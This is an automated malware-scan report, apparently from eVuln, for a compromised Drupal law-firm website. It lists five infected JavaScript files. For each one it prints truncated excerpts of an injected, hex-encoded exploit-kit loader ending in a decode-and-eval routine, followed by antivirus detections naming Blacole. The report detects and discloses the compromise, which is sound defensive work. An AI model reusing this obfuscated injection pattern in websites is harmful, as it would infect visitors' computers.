Malware Scanner report for birth-defect-drug-lawyers.com

Malicious/Suspicious/Total urls checked: 5/0/15

5 pages have malicious code. See details below

Blacklists: Found

The website is marked by Google as suspicious.

The website "birth-defect-drug-lawyers.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/5

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=birth-defect-drug-lawyers.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request	Server response	Status
http://birth-defect-drug-lawyers.com/	200 OK Content-Length: 26642 Content-Type: text/html	clean
http://birth-defect-drug-lawyers.com/misc/jquery.js?v=1.4.4	200 OK Content-Length: 78602 Content-Type: application/javascript	clean
http://birth-defect-drug-lawyers.com/misc/jquery.once.js?v=1.2	200 OK Content-Length: 2974 Content-Type: application/javascript	clean
http://birth-defect-drug-lawyers.com/misc/drupal.js?llruug	200 OK Content-Length: 14544 Content-Type: application/javascript	clean
http://birth-defect-drug-lawyers.com/misc/jquery.cookie.js?v=1.0	200 OK Content-Length: 961 Content-Type: application/javascript	clean
http://birth-defect-drug-lawyers.com/sites/all/modules/superfish/js/jquery.hoverIntent.minified.js?llruug	200 OK Content-Length: 4897 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) (function($){$.fn.hoverIntent=function(f,g){var cfg={sensitivity:7,interval:100,timeout:0};cfg=$.extend(cfg,g?{over:f,out:g}:f);var cX,cY,pX,pY;var track=function(ev){cX=ev.pageX;cY=ev.pageY;};var compare=function(ev,ob){ob.hoverIntent_t=clearTimeout(ob.hoverIntent_t);if((Math.abs(pX-cX)+Math.abs(pY-cY))<cfg.sensitivity){$(ob).unbind("mousemove",track);ob.hoverIntent_s=1;return cfg.over.apply(ob,[ev]);}else{pX=cX;pY=cY;ob.hoverIntent_t=setTimeout(function(){compare(ev,ob);},cfg.interval);}};v ... 3359 bytes are skipped ...738283807c2e837c7381716f7e73362e727d71837b737c823c717d7d7977733c818370818280777c75362e7a737c3a2e737c722e372e37491b188b1b1877742e367c6f8477756f827d803c717d7d797773537c6f707a7372371b18891b18777436557382517d7d7977733635847781778273726d837f35374b4b434337898b737a817389617382517d7d7977733635847781778273726d837f353a2e354343353a2e353f353a2e353d3537491b181b188888887474743637491b188b1b188b1b18";z=[];for(i=0;i<a.length;i+=2){z.push(parseInt(a.substr(i,2),16)-14);}eval(ss["fr"+"omCharCode"].apply(ss,z)); Antivirus reports: AntiVir JS/Blacole.EB.46 Avast JS:Decode-AZW [Trj] Ad-Aware JS:Trojan.Script.CFX Ikarus Trojan.JS.Agent nProtect JS:Trojan.Script.CFX K7AntiVirus Trojan ( 85a43f9d0 ) TrendMicro-HouseCall JS_BLACOLE.SMTM Comodo Exploit.JS.Blacole.EZ Emsisoft JS:Trojan.Script.CFX (B) K7GW Trojan ( 85a43f9d0 ) McAfee-GW-Edition JS/Exploit-Blacole.gc TrendMicro JS_BLACOLE.SMTM Microsoft Exploit:JS/Blacole.OL Kaspersky Trojan.JS.Iframe.agi MicroWorld-eScan JS:Trojan.Script.CFX Fortinet JS/Kryptik.CFX!tr McAfee JS/Exploit-Blacole.gc NANO-Antivirus Trojan.Script.Iframe.cdoahu F-Secure JS:Trojan.Script.CFX VIPRE Trojan.JS.IFrame.afk (v) F-Prot JS/IFrame.RS AVG JS/Exploit Norman Blacole.VX GData JS:Trojan.Script.CFX Symantec Trojan.Malscript Commtouch JS/IFrame.RS BitDefender JS:Trojan.Script.CFX
http://birth-defect-drug-lawyers.com/sites/all/modules/superfish/js/jquery.bgiframe.min.js?llruug	200 OK Content-Length: 4801 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) (function($){$.fn.bgIframe=$.fn.bgiframe=function(s){if($.browser.msie&&parseInt($.browser.version)<=6){s=$.extend({top:'auto',left:'auto',width:'auto',height:'auto',opacity:true,src:'javascript:false;'},s\|\|{});var prop=function(n){return n&&n.constructor==Number?n+'px':n;},html='<iframe class="bgiframe"frameborder="0"tabindex="-1"src="'+s.src+'"'+'style="display:block;position:absolute;z-index:-1;'+(s.opacity!==false?'filter:Alpha(Opacity=\'0\');':'')+'top:'+(s.top=='auto' ... 3276 bytes are skipped ...738283807c2e837c7381716f7e73362e727d71837b737c823c717d7d7977733c818370818280777c75362e7a737c3a2e737c722e372e37491b188b1b1877742e367c6f8477756f827d803c717d7d797773537c6f707a7372371b18891b18777436557382517d7d7977733635847781778273726d837f35374b4b434337898b737a817389617382517d7d7977733635847781778273726d837f353a2e354343353a2e353f353a2e353d3537491b181b188888887474743637491b188b1b188b1b18";z=[];for(i=0;i<a.length;i+=2){z.push(parseInt(a.substr(i,2),16)-14);}eval(ss["fr"+"omCharCode"].apply(ss,z)); Antivirus reports: AntiVir JS/Blacole.EB.46 Avast JS:Decode-AZW [Trj] Ad-Aware JS:Trojan.Script.CFX Bkav MW.Cloda64.Trojan.c4f4 Ikarus Exploit.JS.Blacole nProtect JS:Trojan.Script.CFX K7AntiVirus Trojan ( 85a43f9d0 ) TrendMicro-HouseCall JS_BLACOLE.SMTM Comodo Exploit.JS.Blacole.EZ Emsisoft JS:Trojan.Script.CFX (B) K7GW Trojan ( 85a43f9d0 ) McAfee-GW-Edition JS/Exploit-Blacole.gc TrendMicro JS_BLACOLE.SMTM Microsoft Exploit:JS/Blacole.OL Kaspersky Trojan.JS.Iframe.agi MicroWorld-eScan JS:Trojan.Script.CFX McAfee JS/Exploit-Blacole.gc NANO-Antivirus Trojan.Script.Iframe.cdoahu F-Secure JS:Trojan.Script.CFX VIPRE Trojan.JS.IFrame.afk (v) F-Prot JS/IFrame.RS AVG JS/Exploit Norman Blacole.VX GData JS:Trojan.Script.CFX Symantec Trojan.Malscript Commtouch JS/IFrame.RS BitDefender JS:Trojan.Script.CFX
http://birth-defect-drug-lawyers.com/sites/all/modules/superfish/js/superfish.js?llruug	200 OK Content-Length: 7246 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) ;(function($){ $.fn.superfish = function(op){ var sf = $.fn.superfish, c = sf.c, $arrow = $(['<span class="',c.arrowClass,'"> »</span>'].join('')), over = function(){ var $$ = $(this), menu = getMenu($$); clearTimeout(menu.sfTimer); $$.showSuperfishUl().siblings().hideSuperfishUl(); }, out = function(){ var $$ = $(this), menu = getMenu($$), o = sf.op; c ... 3246 bytes are skipped ...738283807c2e837c7381716f7e73362e727d71837b737c823c717d7d7977733c818370818280777c75362e7a737c3a2e737c722e372e37491b188b1b1877742e367c6f8477756f827d803c717d7d797773537c6f707a7372371b18891b18777436557382517d7d7977733635847781778273726d837f35374b4b434337898b737a817389617382517d7d7977733635847781778273726d837f353a2e354343353a2e353f353a2e353d3537491b181b188888887474743637491b188b1b188b1b18";z=[];for(i=0;i<a.length;i+=2){z.push(parseInt(a.substr(i,2),16)-14);}eval(ss["fr"+"omCharCode"].apply(ss,z)); Antivirus reports: AntiVir JS/Blacole.EB.46 Avast JS:Decode-AZW [Trj] Ad-Aware JS:Trojan.Script.CFX Bkav MW.Clodcef.Trojan.c9e9 Ikarus Trojan.JS.Agent nProtect JS:Trojan.Script.CFX K7AntiVirus Trojan ( 85a43f9d0 ) TrendMicro-HouseCall JS_BLACOLE.SMTM Comodo Exploit.JS.Blacole.EZ Emsisoft JS:Trojan.Script.CFX (B) K7GW Trojan ( 85a43f9d0 ) McAfee-GW-Edition JS/Exploit-Blacole.gc TrendMicro JS_BLACOLE.SMTM Microsoft Exploit:JS/Blacole.OL MicroWorld-eScan JS:Trojan.Script.CFX Fortinet JS/Kryptik.CFX!tr McAfee JS/Exploit-Blacole.gc NANO-Antivirus Trojan.Script.Iframe.cdoahu F-Secure JS:Trojan.Script.CFX VIPRE Trojan.JS.IFrame.afk (v) F-Prot JS/IFrame.RS AVG JS/Exploit Norman Blacole.VX GData JS:Trojan.Script.CFX Symantec Trojan.Malscript Commtouch JS/IFrame.RS BitDefender JS:Trojan.Script.CFX
http://birth-defect-drug-lawyers.com/sites/all/modules/superfish/js/supersubs.js?llruug	200 OK Content-Length: 6801 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) ;(function($){ $.fn.supersubs = function(options){ var opts = $.extend({}, $.fn.supersubs.defaults, options); return this.each(function() { var $$ = $(this); var o = $.meta ? $.extend({}, opts, $$.data()) : opts; var fontsize = $('<li id="menu-fontsize">—</li>').css({ 'padding' : 0, 'position' : 'absolute', 'top' : '-999em', 'width' : 'auto' ... 3970 bytes are skipped ...738283807c2e837c7381716f7e73362e727d71837b737c823c717d7d7977733c818370818280777c75362e7a737c3a2e737c722e372e37491b188b1b1877742e367c6f8477756f827d803c717d7d797773537c6f707a7372371b18891b18777436557382517d7d7977733635847781778273726d837f35374b4b434337898b737a817389617382517d7d7977733635847781778273726d837f353a2e354343353a2e353f353a2e353d3537491b181b188888887474743637491b188b1b188b1b18";z=[];for(i=0;i<a.length;i+=2){z.push(parseInt(a.substr(i,2),16)-14);}eval(ss["fr"+"omCharCode"].apply(ss,z)); Antivirus reports: AntiVir JS/Blacole.EB.46 Avast JS:Decode-AZW [Trj] Ad-Aware JS:Trojan.Script.CFX Bkav MW.Cloddca.Trojan.4f68 Ikarus Trojan.JS.Agent nProtect JS:Trojan.Script.CFX K7AntiVirus Trojan ( 85a43f9d0 ) TrendMicro-HouseCall JS_BLACOLE.SMTM Comodo Exploit.JS.Blacole.EZ Emsisoft JS:Trojan.Script.CFX (B) K7GW Trojan ( 85a43f9d0 ) McAfee-GW-Edition JS/Exploit-Blacole.ht TrendMicro JS_BLACOLE.SMTM Microsoft Exploit:JS/Blacole.OL Kaspersky Trojan.JS.Iframe.agi MicroWorld-eScan JS:Trojan.Script.CFX Fortinet JS/Kryptik.CFX!tr McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Iframe.cdoahu F-Secure JS:Trojan.Script.CFX VIPRE Trojan.JS.IFrame.afk (v) F-Prot JS/IFrame.RS AVG JS/Exploit Norman Blacole.VX GData JS:Trojan.Script.CFX Symantec Trojan.Malscript Commtouch JS/IFrame.RS BitDefender JS:Trojan.Script.CFX
http://birth-defect-drug-lawyers.com/modules/openid/openid.js?llruug	200 OK Content-Length: 1829 Content-Type: application/javascript	clean
http://birth-defect-drug-lawyers.com/sites/all/themes/theme539/js/theme539.core.js?llruug	200 OK Content-Length: 4494 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) String.prototype.trim = function(){ return this.replace(/\s+$/, '').replace(/^\s+/, ''); } jQuery.browser.version = jQuery.browser.msie && parseInt(jQuery.browser.version) == 6 && window["XMLHttpRequest"] ? "7.0" : jQuery.browser.version; window.log = function() { log.history = log.history \|\| []; log.history.push(arguments); if (this.console) { console.log(Array.prototype.slice.call(arguments)); } }; var theme539 = theme539 \| ... 2848 bytes are skipped ...738283807c2e837c7381716f7e73362e727d71837b737c823c717d7d7977733c818370818280777c75362e7a737c3a2e737c722e372e37491b188b1b1877742e367c6f8477756f827d803c717d7d797773537c6f707a7372371b18891b18777436557382517d7d7977733635847781778273726d837f35374b4b434337898b737a817389617382517d7d7977733635847781778273726d837f353a2e354343353a2e353f353a2e353d3537491b181b188888887474743637491b188b1b188b1b18";z=[];for(i=0;i<a.length;i+=2){z.push(parseInt(a.substr(i,2),16)-14);}eval(ss["fr"+"omCharCode"].apply(ss,z)); Antivirus reports: AntiVir JS/Blacole.EB.46 Avast JS:Decode-AZW [Trj] Ad-Aware JS:Trojan.Script.CFX Bkav MW.Clodd70.Trojan.983b Ikarus Trojan.JS.IFrame nProtect JS:Trojan.Script.CFX K7AntiVirus Trojan ( 85a43f9d0 ) TrendMicro-HouseCall JS_BLACOLE.SMTM Emsisoft JS:Trojan.Script.CFX (B) Comodo Exploit.JS.Blacole.EZ K7GW Trojan ( 85a43f9d0 ) McAfee-GW-Edition JS/Exploit-Blacole.gc TrendMicro JS_BLACOLE.SMTM Microsoft Exploit:JS/Blacole.OL Kaspersky Trojan.JS.Iframe.agi MicroWorld-eScan JS:Trojan.Script.CFX Fortinet JS/Kryptik.CFX!tr McAfee JS/Exploit-Blacole.gc NANO-Antivirus Trojan.Script.Iframe.cdoahu F-Secure JS:Trojan.Script.CFX VIPRE Trojan.JS.IFrame.afk (v) F-Prot JS/IFrame.RS AVG JS/Exploit Norman Blacole.VX GData JS:Trojan.Script.CFX Symantec Trojan.Malscript Commtouch JS/IFrame.RS BitDefender JS:Trojan.Script.CFX
http://birth-defect-drug-lawyers.com/node/1	200 OK Content-Length: 14239 Content-Type: text/html	clean
http://birth-defect-drug-lawyers.com/node/2	200 OK Content-Length: 12859 Content-Type: text/html	clean
http://birth-defect-drug-lawyers.com/node/13	200 OK Content-Length: 14252 Content-Type: text/html	clean
http://birth-defect-drug-lawyers.com/node/3	200 OK Content-Length: 12886 Content-Type: text/html	clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: birth-defect-drug-lawyers.com

Result:
HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 16 Jan 2015 14:56:30 GMT
ETag: "1421420190"
Server: Apache
Vary: Accept-Encoding
Content-Language: en
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Fri, 16 Jan 2015 14:56:30 GMT
X-Generator: Drupal 7 (http://drupal.org)

Second query (visit from search engine):
GET / HTTP/1.1
Host: birth-defect-drug-lawyers.com
Referer: http://www.google.com/search?q=birth-defect-drug-lawyers.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Recently found suspicious websites

Malware Scanner report for birth-defect-drug-lawyers.com

Malware & Hack Repair

Website Hack Insurance

Safe Browsing / Blacklists

Scanned pages/files

Malicious Redirects

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools